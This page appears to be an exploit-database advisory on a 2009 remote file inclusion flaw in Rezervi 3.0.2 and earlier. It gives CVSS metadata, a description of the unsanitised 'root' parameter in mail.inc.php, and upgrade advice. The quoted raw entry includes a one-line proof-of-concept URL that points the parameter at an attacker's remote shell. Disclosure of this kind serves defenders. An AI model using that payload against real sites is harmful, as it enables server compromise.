Rezervi - exploit.company

vendor:

Rezervi

by:

r00t.h4x0r

9,3

CVSS

HIGH

Remote File Inclusion (RFI)

CWE

Product Name: Rezervi

Affected Version From: 3.0.2 and prior

Affected Version To: 3.0.2 and prior

Patch Exists: Yes

Related CWE: N/A

CPE: a:rezervi:rezervi

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Rezervi <= 3.0.2 (mail.inc.php) RFI Vulnerablities

Rezervi version 3.0.2 and prior are vulnerable to a Remote File Inclusion (RFI) vulnerability. This vulnerability is due to a failure in the application to properly sanitize user-supplied input to the 'root' parameter in the '/include/mail.inc.php' script. An attacker can exploit this vulnerability to include arbitrary remote files, allowing for the execution of arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of Rezervi, which is not vulnerable to this issue.

Source

Exploit-DB raw data:

###############################################################
##     Rezervi <= 3.0.2 (mail.inc.php) RFI Vulnerablities    ##
##                  http://www.rezervi.com                   ##
###############################################################   



###############################################################
Discovered : r00t.h4x0r <r00t.h4x0r[!]hotmail.com>
Homepage   : !n y0ur m!nd
###############################################################
PoC r00t : 

[r00t.h4x0r]/include/mail.inc.php?root=[Shell]

###############################################################
9r33tz : cr4wl3r
###############################################################

#################### [ INDONESIAN HACKER ] ####################